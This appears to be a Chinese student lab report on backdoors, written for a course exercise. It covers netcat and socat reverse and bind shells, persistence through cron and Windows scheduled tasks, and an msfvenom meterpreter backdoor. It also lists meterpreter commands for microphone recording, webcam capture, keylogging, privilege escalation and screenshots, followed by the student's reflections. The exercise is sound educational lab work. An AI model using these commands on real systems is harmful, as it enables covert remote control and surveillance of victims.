Exp2 后门原理与实践-------20164325王晓蕊
Exp2 后门原理与实践
任务一:使用netcat获取主机操作Shell,cron启动
1.windows获取linux shell
1.1 ipconfig 查看本机查看以太网适配器(8)的ipv4地址
1.2windows: ncat.exe -l -p 4325 调用ncat.exe程序来蹲守本机的4325端口
1.3 nc 192.168.182.1 4325 –e /bin/sh 在Kali环境下,使用nc指令的-e参数反向连接Windows主机的4325端口:
2.linux获得windows shell
2.1 Kali : ifconfig 命令查看IP
2.2 kali: nc –l –p 4325 使用nc指令蹲守4325端口。
2.3 Windows: ncat.exe –e cmd.exe 192.168.113.133 4325 调用ncat.exe程序并用-e参数反向连接Kali主机的4325端口。
3. 使用nc传输数据
3.1 ncat.exe –l 4325 Windows下蹲守4325端口
3.2 nc 192.168.182.1 4325 建立连接
3.3 之后就可以传输数据了,在kali上打字,windows主机屏幕上也会显示你打的内容。
4. 使用netcat获取主机操作Shell,cron启动
4.1 windows: ncat.exe -l -p 4325 监听本地4325端口
4.2crontab -e编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行(3号)。
点i进行编辑,在最后一行编辑 03* * * * /bin/netcat 192.168.182.1 4325 -e /bin/sh ( :wq 保存退出),这里我选择的是每小时的第三分钟。
4.3 等到了10:03分的时候就可以在windows中查看了。
任务二:使用socat获取主机操作Shell, 任务计划启动
2.1在Windows系统下,打开:控制面板->系统和安全->管理工具->任务计划程序,在操作选项(菜单栏)中,选择“创建任务”。
- 名称:20164325
- 新建触发器,选择开始任务时间为:工作站锁定时。
- 新建操作,选择启动的程序为 socat.exe ,参数项填为 tcp-listen:43251 exec:cmd.exe,pty,stderr ,含义为:把cmd.exe绑定到端口号,同时把cmd.exe的stderr重定向到stdout上
- 运行任务
2.2在kali终端输入指令 socat - tcp:192.168.113.1:43251
注意:之前的任务我都是用的以太网适配器vmware network adapter vmnet1 在之前的任务中都可以成功,就是这个任务会出现问题,问了同学才知道,要用以太网适配器vmware network adapter vmnet8的ipv4,解决的问题。
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
3.1Kali: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.113.133 LPORT=4325 -f exe > 20164325_backdoor.exe ,注意这里的IP地址为控制端IP,即在kali上查的IP,可见已经生成了后门程序“ 20164325_backdoor.exe ”
3.2Windows: ncat.exe -lv 4325 > 20164325_backdoor.exe ,这样被控主机就进入了接收文件模式,开始传输中的时候是只有前两行,下面是连接上了,文件传输成功的截图
3.3在kali中执行 nc 192.168.1.155 4325 < 20164325_backdoor.exe ,注意这里的IP为被控主机IP,即WindowsIP (ps:这里我出现了问题,所以我就把三个可用的ipv4地址都试了一下,结果是无线局域网的可以使用)
在Kali上使用 msfconsole 指令进入msf控制台
- use exploit/multi/handler 使用监听模块,设置payload
- set payload windows/meterpreter/reverse_tcp ,使用和生成后门程序时相同的payload
- set LHOST 192.168.113.133 ,这里用的是kali IP,和生成后门程序时指定的IP相同
- set LPORT 4325 ,同样要使用相同的端口
3.5设置完成后,执行监听
(我是双击的后门文件,来开启的)以下是监听结果,开启后门文件之前就只有前一行。
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
4.1目标主机音频
使用 record_mic 指令可以截获一段音频,可以用 -d 选项设置录制时间
4.2摄像头
webcam_snap 指令可以使用摄像头进行偷拍
webcam stream 指令可以使用摄像头进行录像
4.3击键记录
keyscan_start 指令开始记录下击键的过程
keyscan_dump 指令读取击键的记录
(第一行我实在命令行中输入的指令,随便输入的;第二行就是在word里面输入的,后面的一些东西是我按的空格)
4.4提权
getuid 指令查看当前用户
getsystem 指令进行提权
4.5截屏
screenshot 指令可以进行截屏,效果如下:
五.实验总结与体会
这次实验我吸取了上次实验的教训,对虚拟机的操作更加的顺利,但是我在ip地址的部分出了很多问题,第一次实在任务三的时候;会出现攻击者的ip和被攻击者的ip混的情况,这也是没有清楚原理的表现,这种情况就是刚开始做的时候会出现,但是之后就不会出现这种问题了;还有一个问题,就是要随时检查windows的ip和kali的ip,避免实验出现问题。做任务四的时候真的感受到了恐怖,之后一定会对自己的电脑做好防护。
六.基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:这个实验中的后门就是运行一个程序,双击就能开启后门,让人监听;所以我觉得它可能无处不在,会在软件里双击打开,或者安装时就会出现;我觉得还会在网页中打开吧,比如说有一个链接,就会连着后门文件;应该也会潜在下载的文件啊啥的,能打开的东西上。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:伪装吧,让计算机中的防火墙和杀毒软件不会直把它灭掉,以为是什么其他的安全软件;我觉得还可能是更改被攻击主机的什么设置,让主机找不到这个后门。
像实验中所说的:Linux可以使用cron启动,Windows下通过任务计划来启动后门程序。
(3)Meterpreter有哪些给你映像深刻的功能?
答:获取摄像头权限进行拍照和视频,录音,提升用户权限等等都很恐怖深刻。
(4)如何发现自己有系统有没有被安装后门?
答:杀毒软件等等的那种防护检查漏洞的软件,来检查是否安装后门。